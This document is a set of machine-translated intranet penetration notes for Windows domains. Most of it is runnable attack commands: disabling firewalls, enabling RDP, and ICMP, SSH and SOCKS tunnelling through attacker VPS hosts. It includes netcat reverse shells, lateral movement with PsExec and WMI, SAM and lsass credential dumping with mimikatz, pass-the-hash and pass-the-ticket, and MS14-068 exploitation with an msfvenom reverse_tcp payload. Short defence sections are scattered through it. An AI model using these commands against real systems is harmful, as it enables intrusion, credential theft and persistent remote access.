Intranet penetration concise notes

Chapter two - Intranet information collection

2.1 =================  Workgroup manual information collection  ==================
1. Query network configuration information 
    ipconfig /all

2. Query operating system and software information 
    systeminfo
     Look at the system architecture 
    echo %PROCESSOR_ARCHItECTURE%
     Check the installed software, version and path 
    wmic product get name,version

3. Local information service 
    wmic service list brief

4. Query process list 
    tasklist /v
     View details 
    wmic process list brief
    
5. Check the startup program information 
    wmic startup get command,caption
6. View scheduled tasks 
    schtasks /query /fo LIST /v
7. Check the boot time of the host 
    net statistics workstation
8. Query user list 
    net user
     Get local administrator information 
    net localgroup administrators
     Check out online users 
    query user || qwinsta
9. List conversations 
    net session
10. Check out the port list 
    netstat -ano
11. Check out the patches 
    systeminfo
    wmic qfe get Caption,Description,HotFixID,InstalledOn
12. Query local share list 
    net share
    wmic share get name,path,status
13. Query routing tables and ARP Cache table 
    route print
    arp -a
14. Query firewall 
（1） Turn off firewall 
    #win_server2003 And previous versions 
    netsh firewall set opmode disable
    #win_server2003 After the version 
    netsh advfirewall set allprofiles state off
（2） View firewall configuration 
    netsh firewall show config
（3） Modify firewall configuration 
    Windows Server 2003  System and previous versions , Allow all specified programs to connect , The order is as follows .
    netsh firewall add allowedprogram c:\nc.exe "allow nc" enable
 
    Windows Server 2003  After that, the system version , The situation is as follows .
     Allow the specified program to connect to , The order is as follows .
    netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"
    
     Allow the specified program to connect , The order is as follows .
    netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C:\nc.exe"
    
     allow  3389  Port release , The order is as follows .
    netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
    
（4） Custom firewall log storage location 
    netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"

15. Check the agent configuration 
    reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

16. Query and start the remote connection service 
（1） View the remote connection port 
 stay cmd Use the registry query statement , The order is as follows , Get the connection port as  0xd3d, Converted to  3389
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
 
（2） stay  Windows Server2003 In the open 3389 port 
wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
 
（3） stay  Windows Server 2008  and  Windows Server 2012  In the open  3389  port 
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
 
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1
 
reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

2.2 =============  Automatic information collection  ================
#Empire Information collection under 
(Empire: W12MRC5H) > usemodule situational_awareness/host/winenum
(Empire: powershell/situational_awareness/host/winenum) > execute


2.3 ============== Query current permissions =================
 View current permissions 
whoami
 Get domain  SID
whoami /all              # Get domain  SID
 Query the details of the specified account 
net user XXX /domain     # Query the details of the specified account 

2.4 =============== Determine whether there is a domain ==================
1. Use  ipconfig  command 
ipconfig /all    # Execute the following command , You can see the gateway  P Address 、DNS Of IP Address 、 Whether the local address is the same as DNS The server is in the same network segment 、 Domain name etc. 
nslookup hello.testlab    # Query command through reverse parsing  nslookup  To resolve the domain name IP Address . Use the parsed IP Address comparison , Determine the domain controller and DNS Whether the server is on the same server 
2. View system details 
systeminfo    # As shown in the figure below, the domain name is the domain name , The login server is a domain controller . If the field appears as WORKGROUP, Indicates that the current server is not in the domain . The current domain name is hello.testlab.
3. Query the current login domain and login user information 
net config workstation     ## Workstation domain DNS Name displays the domain name （ If it shows  WORKGROUP, Indicates a non domain environment ）. Login domain indicates whether the current user is a domain user or a local user , This indicates that the current user is logged in locally .

4. Determine the primary domain 
net time /domain     # Execute the following command , Determine the primary domain , Generally, the domain server will also serve as the time server .
1. Domain of existence , But the current user is not a domain user , Tips ' A system error occurred 5'
2. Domain of existence , And the current user is a domain user , Tips 'DC.hello.testlab  The time is xxx'
3. The current network environment is workgroup , No domain exists , Tips ' Domain not found xxx The controller '

2.5 ================== Probe domain memory live host =============
1. utilize  NetBIOS  Fast detection of intranet 
    nbtscan  192.168.1.0/24
    nbtscan.exe 192.168.1.0/24    
2. utilize  ICMP  The protocol can quickly detect the intranet 
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

2.6 ==================== SCAN domain ports =================

1. Probe host port 
telnet DC 22
telnet DC 1443

2.S Scanner 
S.exe TCP 192.168.1.1 192.168.1.254 445,3389,1433,7001,1099,8080,80,22,23,21,25,110,3306,5432,1521,6379,2049,111 256 /Banner /save
#S  Scanner is a relatively fast port scanning tool in the early days , Especially suitable for operation in  Windows Sever2003  On the following platforms , Support large network segment scanning 

3.Metasploit  Port scanning 
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > show options
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.2
RHOSTS => 192.168.1.2
msf5 auxiliary(scanner/portscan/tcp) > set PORTS 1-1024
PORTS => 1-1024
msf5 auxiliary(scanner/portscan/tcp) > set THREADS 100
THREADS => 100
msf5 auxiliary(scanner/portscan/tcp) > run

2.7=================== Collect basic information in the domain =================
1. Query domain 
net view /domain

2. Query all computers in the domain 
net view /domain:HACKE

3. Query the user group list 
net group /domain

Domain Admins： Domain Administrators group .
Domain Computers： Domain machines .
Domain Controllers： domain controller .
Domain Guest： Domain guest group , Low authority .
Domain Users： Domain users .
Enterprise Admins： Enterprise system administrator user .
 By default ,Domain Admins  and  Enterprise Admins  Have full control over all domain controllers in the domain .

4. Query the list of computers in the domain 
net group "domain computers" /domain

5. Get domain password information 
net account domain    # Get domain password policy settings 、 Password length 、 Error locking and other information 

6. Get trust information 
nltest /domain_trusts


2.8 =====================  Find a domain controller  ==================
1． View the machine name of the controller in the domain 
nltest /DCLIST:hacke
2． View the host name of the domain controller (dc.hacke.testlab)
Nslookup -type=SRV _ldap._tcp
3． View current time 
net time /domain    # The general time server is not the primary domain control server 
4． View domain controllers group 
net group "Domain Controllers" /domain
netdom query pdc    # In the real world , Generally, there are two or more domain controllers , Its purpose is to ： Once the primary domain controller fails , The standby domain controller can make the intra domain service authentication work normally .

2.9 ================  Get user and administrator information in the domain  =================
1． Query the domain controller 
net user /domain
2． Get user details in the domain 
wmic useraccount get /all
3． View existing users 
dsquery user
 
1 dsquery computer    - Find computers in the directory .
2 dsquery contact    - Find contacts in the directory .
3 dsquery subnet     - Find the subnet in the directory .
4 dsquery group     - Find groups in the directory .
5 dsquery ou     - Find the organizational units in the directory .
6 dsquery site    - Find sites in the directory .
7 dsquery server     - Find... In the catalog AD DC/LDS example .
8 dsquery user     - Find users in the directory .
9 dsquery quota     - Find quota provisions in the directory .
10 dsquery partition     - Find partitions in the directory .
11 dsquery *     - General purpose LDAP Query to find any object in the directory .

4． Query the users of the built-in local administrator group in the domain 
net localgroup administrators /domain

2.9.2 ===================  Query domain administrators user group  ==============
1． Query domain administrator user 
net group "domain admins" /domain
2． Query administrator user group 
net group "Enterprise Admins" /domain

2.10 ===================  Locate the domain administrator ( Tools ) ================
psloggedon.exe
pveFindADUser.exe
netview.exe
Nmap  Of  NSE  Script 
PowerView
Empire  Under the  user_hunter  modular 

The first 4 Chapter - Tunnel

 Judge intranet connectivity ：
ICMP agreement 
ping

TCP agreement ：
linux:netcat（ abbreviation nc）#nc ip Address   port 

http agreement ：
curl www.baidu.com
(windows To be installed curl command )

DNS agreement ：
windows:nslooup www.baidu.com vsp-ip
linux:dig @vps-ip www.baidu.com

ICMP Tunnel 
1.icmpsh:
vps
    git clone https://github.com/inquisb/icmpsh.git
    sysctl -w net.ipv4.icmp_echo_ignore_all=1     # Shutdown system Ping Command response , After use, change to 0
    cd icmpsh
    pip install impacket
    ./icmpsh_m.py 192.168.0.11 192.168.0.8    #192.168.0.11 For native attacks ip Address ,192.168.0.8 Is the public network of the target ip Address 
    # have access to ping vpsip Address ,tcpdump icmp To get the public network of the target machine ip

 Target machine 
	icmpsh.exe -t 192.168.0.11 -d 500 -b 30 -s 128

2.pingtunnel
# stay Web The server 192.168.1.4 Enter the following command :
ptunnel -x shuteer
# stay VPS machine 192.168.1.10 Execute the following command 
ptunnel -p 192.168.1.4 -lp 1080 -da 1.1.1.10 -dp 3389 -x shuteer

-x: Appoint ICMP Authentication password for tunnel connection .
-lp: Specify the local TCP port .
-da: Specifies the name of the target machine to forward IP Address .
-dp: Specifies the name of the target machine to forward TCP port .
-p: Appoint ICMP Of the machine at the other end of the tunnel IP Address .

 The meaning of the above order is : Accessing the attacker VPS ( 192.168.1.10 ） Of 1080 Port time , Will put the database server 1.1.1.10  Of 3389 The data of the port is encapsulated in ICMP In the tunnel , With  Web The server 192.168.1.4 by ICMP Tunnel gangway for transmission .


3. defense ICMP Tunnel attack methods 
a. Detect... From the same source ICMP Number of packets , A normal ping The command can send up to two packets per second , But to ICMP Tunnel browsers will generate thousands of them in a very short time ICMP Data packets 
b. Pay attention to those Payload Greater than 64bit Of ICMP Data packets 
c. Look for... In the response packet Payload The same as in the request packet Payload inconsistent ICMP Data packets 
d. Check ICMP The protocol label of the packet . for example ,icmptunnel Will be in all ICMP Payload Add “TUNL" Mark to identify the tunnel 



 Transport layer tunneling technology 
1.lcx Port forwarding 
a. Execute the following command on the target machine , Put the target machine 3389 All data of the port is forwarded to the public network VPS Of 4444 On port .
lcx.exe -slave< Public network host IP Address >4444 127.0.0.1 3389
b. stay VPS Execute the following command above , Put the machine 4444 All data monitored on the port is forwarded to the local port 5555 On port .
lcx.exe -listen 4444 5555

2.netcat
-d: The background model .
-c: Program redirection .
-g < gateway >: Set up router hop communication gateway , Up to 8 individual .
-G< Number of pointing devices >: Set the number of source route directors , The value is 4 Multiple .
-h: Online Help .
-i< Delay seconds >: Set the time interval , So as to transmit information and scan the communication port .
-l: Use monitor mode , Manage and control incoming data .
-n: Use it directly IP Address （ Not through the domain name server )
-o < The output file >: Specify the file name , The transmitted data is converted into hexadecimal byte code and saved in the file .
-p< Communication port >: Set the communication port used by the local host .
-r: Randomly specify the communication ports between local and remote hosts .
-s< source address >: Set the packet sent by the local host IP Address .
-u: Use UDP Transfer protocol .
-v: Detailed output .
-w< Timeout seconds >: Set the time to wait for the connection .
-z: Enter / The output function is off , Only used when scanning the communication port .

1. Grab Banner Information 
    nc -nv 192.168.123.103 21
2. Connect to remote host 
    nc -nvv 192.168.11.135 80
3. Port scanning 
    nc -v 192.168.11.138 80
    nc -v -z 192.168.11.138 20-1024
4. Port listening 
    nc -l -p 9999
5. File transfer 
    A host ：nc -lp 333 >1.txt
    B host ：nc -vn 192.168.1.4333 < test.txt -q 1
6. Easy chat 
    A:nc -l -p 888
    B:nc -vn 192.168.1.4 888

7. obtain shell
a. positive shell
 The victim ：
    nc -lvp 4444 -e /bin/sh                     //Linux
    nc -lvp 4444 -e c:\windows\system32\cmd.exe //windows
 attack ：
    nc 192.168.1.11 4444
b. reverse shell
 The victim ：
    nc 192.168.11.144 9999 -e /bin/sh                       //Linux
    nc 192.168.11.144 9999 -e c:\windows\system32\cmd.exe   //windows
 attack ：
    nc -lvp 9999

8. Intranet agent 
 stay VPS Enter the following command 
    nc -lvp 3333
web The server 
    nc -v 192.168.1.4 3333 -c "nc -v 1.1.1.200 3333"
 database server 
    nc -lvp 3333 -e /bin/ sh


3.4 =========  Application layer tunneling technology (linux/unix) =========
1.ssh agreement 
 An ordinary SSH The order is as follows .
    -C: Compressed transmission , Increase transmission speed .
    -f: take SSH Transfer to the background execution , Does not occupy the current Shell.
    -N: Make a silent connection （ It establishes the connection , But I can't see the specific conversation ).
    -g: Allow remote hosts to connect to local forwarding ports .
    -L: Local port forwarding .
    -R: Remote port forwarding .
    -D: Dynamic forwarding （SOCKS agent ).
    -P: Appoint SSH port .

1. Port forwarding 
 Local forwarding 
    ssh -CfNg -L 1153(VPS port ):1.1.1.10( The target host ):3389( Target port ) [email protected]( Springboard machine )
 Remote forwarding 
    ssh -CfNg -R 3307(VPS port ):1.1.1.10( The target host ):3389( Target port ) [email protected]
 Dynamic forwarding （SOCKS agent ）
# stay vps On the implementation , Set in the browser 127.0.0.1:7000 The agent can access the intranet 
    ssh -CfNg -D 7000 [email protected]

2. defense  SSH The idea of tunnel attack 
SSH The reason why the tunnel can be used by attackers , The main reason is that the system access control measures are not enough . Configure... In the system SSH Remote management whitelist , stay ACL  There are only specific restrictions in IP Address to connect SSH, And setting the system to completely use out of band management , Can avoid this problem .
 If there are not enough resources to establish a network structure for out of band management , In the intranet, at least SSH Address and bidirectional access control policy for remote login （ From the outside to the inside ; From the inside to the outside ).

3.5 =============== SOCKS agent  ==============
EarthWorm( whole os)
1. positive socks5 agent （ The target has a public network ip）
    ew -s ssocked -l 888
2. reverse socks5 agent 
    VPS:        ew -s rcsocks -l 1008 -e 888
    web_server: ew -s rssocks -d 139.1.1.113 -e 888
 By setting up a proxy 139.1.1.113:1008 Use web_server proxy server 
3. Secondary network environment a
     Machines in the intranet B：ew -s ssocksd -l 888
     Boundary server A：  ew -s lcx_tran -l 1080 -f A Host public network ip -g 888    # take 1080 The proxy request received by the port is forwarded to the machine in the intranet B Of 888 port 
4. Secondary network environment b
A The host has no public network ip, You can't access the intranet .B The host can access the intranet , Can't access the Internet 
    VPS:  ew -s lcx_listen -l 1080 -e 888    # On the public network vps Add transfer tunnel in , take 1080 The request received by the port is forwarded to 888 port 
     host B:ew -s ssocked -l 999    #ssocked Mode start 999 Port of socks agent 
     host A:ew -s lcx_slave -d vpsip -e 888 -f A host IP -g 999     # stay A Use... On the host lcx_slave The way , take vps Of 888 Port and B The host 999 Ports are connected 
5. Three level network environment 
# Public network VPS Execute the following command above , take 1080 The proxy request received by the port is forwarded to 888 port .
	ew -s rcsocks -l 1080 -e 888
# stay A Execute the following command on the host , The public VPS Of 888 Port and B The host 999 Ports are connected .
	ew -s lcx slave -d 139.*.*.113 -e 888 -f 10.48.128.12 -g 999
# stay B Execute the following command on the host , take 999 The proxy request received by the port is forwarded to 777 port .
	ew -s lcxlisten -l 999 -e 777
# stay C Start on host SOCKS5 service , And bounce back to B The host 777 On port , The order is as follows .
	ew -s rssocks -d 10.48.128.12 -e 777

The fifth chapter - Move horizontally

 Use ipc Connect 
	net use \\192.168.1.106\ipc$ "ning" /user:ning
	net use f: \\192.168.1.1\c$ "@dc123456" /user:"Ning"  ( You can put the other party's c The disk maps to its own z disc , And so on )
 View connections 
	net use
dir command 
	dir \\192.168.43.247\c$
tasklist command 
	tasklist /S 192.168.43.247 /U ning /P ning

 Look at the target time 
	net time \\192.168.1.102

copy  command 
	copy test.bat \\192.168.1.102\c$



 Set up tasks 	
	 The target host <=win server 2008
	at \\192.168.1.102 16:45 c:\test.bat

	 The target host >=win server 2012
	schtasks /create /s 192.168.43.247 /tn test /sc onstart /tr c:\test.bat /ru system /f
 Perform tasks 
	schtasks /run /s 192.168.43.247 /i /tn "test"


 Delete ipc$
	net use \\192.168.43.3\ipc$ /del /y

-------- Export plaintext or hash （ Plaintext <=2008）
1. Use sam and system File export hash 
 export sam and system file 
	reg save hklm\sam sam.hive
	reg save hklm\system system.hive

 adopt mimikatz export hash
	lsadump::sam /sam:sam.hive /system:system.hive

 Turn on reg add command 
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f


2. Use mimikatz Offline reading lsass.dmp file 
 Target machine ：
	Procdump.exe -accepteula -ma lsass.exe lsass.dmp
minikatz:
	sekurlsa::minidump lsass.DMP
	sekurlsa::logonPasswords full
--------------------------------------- windows server 2012
 * Username : Administrator
         * Domain   : WIN-DRORIGCSR3A
         * NTLM     : 9bb8843ea315134b0b6be65b549a9235
         * SHA1     : 151550c9d987e11c9dae2738e03dbcc855c5d4f
---------------------------------------


--------------mimikatz Hash passing 
	privilege::debug
	sekurlsa::pth /user:Ning /domain:hacke.testlab /ntlm:0ef91438203428ca361c8ca653ef101a


-----------mimikatz Bill delivery 
privilege::debug
sekurlsa::tickets /export    Export bill 
kerberos::purge              Delete all tickets 

kerberos::ptt " route "         Inject the ticket into memory 

-----------kekeo Bill delivery 
 Generate bills ：
	kekeo "tgt::ask /user:administrator /domain:hacke.testlab /ntlm:*****"
 Clear the ticket in memory ：
	kerberos::purge
	cmd Middle clearance ：klist purge
 Import the ticket into memory ：
	kerberos::ptt [email protected][email protected]


-------------PsExec
 In establishment $ipc Under the circumstances ：
	PsExec.exe -accepteula \\192.168.43.2 -s cmd.exe


-------------WMI
wmic /node:192.168.43.2 /user:administrator /password:admin process call create "cmd.exe /c ipconfig >ip.txt"

 Use type see ：
	type \\192.168.43.3\C$\ip.txt
	

Chapter six - Domain controlled penetration

 Monitor volume shadow copy service usage 

	 By monitoring the usage of volume shadow copy services , It can discover some malicious operations of the attacker in the system in time .
	 Monitor the volume shadow copy service and any active directory database files involved (ntds.dit) Suspicious operation behavior .
	 monitor System Event ID 7036( The flag that the volume shadow copy service enters the running state ) Suspicious instances of , And how to create vssvc.exe Process events .
	 Monitoring creates dkshndko.exe And related child processes .
	 Monitor the data in the client device diskshadow.exe Instance creation event . Unless the business needs ,  stay Windows Should not appear in the operating system diskshadow.exe. If you find that , It should be deleted immediately .
	 Monitor emerging logical drive mapping events through logs .



MS14_068 Attack process 
1. stay Metasploit To test 
    use auxiliary/admin/kerberos/ms14_068_kerberos_checksum 
    
	 Set parameters 
	DOMAIN: domain name .
	PASSWORD: Password of the authorized user .
	USER: The user who has been authorized .
	USER_SID: Of the authorized user SID.

    exploit

 Fill in all the information , Input “exploit” command , Will be in /rootl.msf4/loot Generate files under directory 20180715230259_default_172.16.86.130_windows.kerberos_839172.bin, Pictured 6-59 Shown .


2. format conversion 
    msf Import is not supported bin file . Use mimikatz Format conversion 
    kerberos::clist ".......bin" /export

3.msfvenom Generate a reverse shell

	msfvenom -p /windows/meterpreter/reverse_tcp LHOST=1.1.1.5 LPORT=7777 -f exe > shell.exe

4.msf Set listening 
	use exploit/multi/reverse_tcp
	exploit
5.
    getuid     View permissions 
    load kiwi 
    kerberos_ticket_use/tmp/...kirbi    # Import bill 
    background
    
6. Test with high authority tickets 
    use exploit/windows/local/current_user_psexec 
    set payload windows/meterpreter/reverse_tcp
    set TECHNIQUE PSH
    set RHOSTS win2008.hello.com
    set lhost 1.1.1.5
    set session 1
    exploit 

 

 
6.6.5 Precautions 

     Turn on Windows Update function , Make automatic updates .
     Manually download the patch package for repair . Microsoft has released a patch to fix this vulnerability 
     Control the account in the domain , The use of weak passwords is prohibited , In time 、 Change your password regularly .
     Install anti-virus software on the server , Update virus database in time .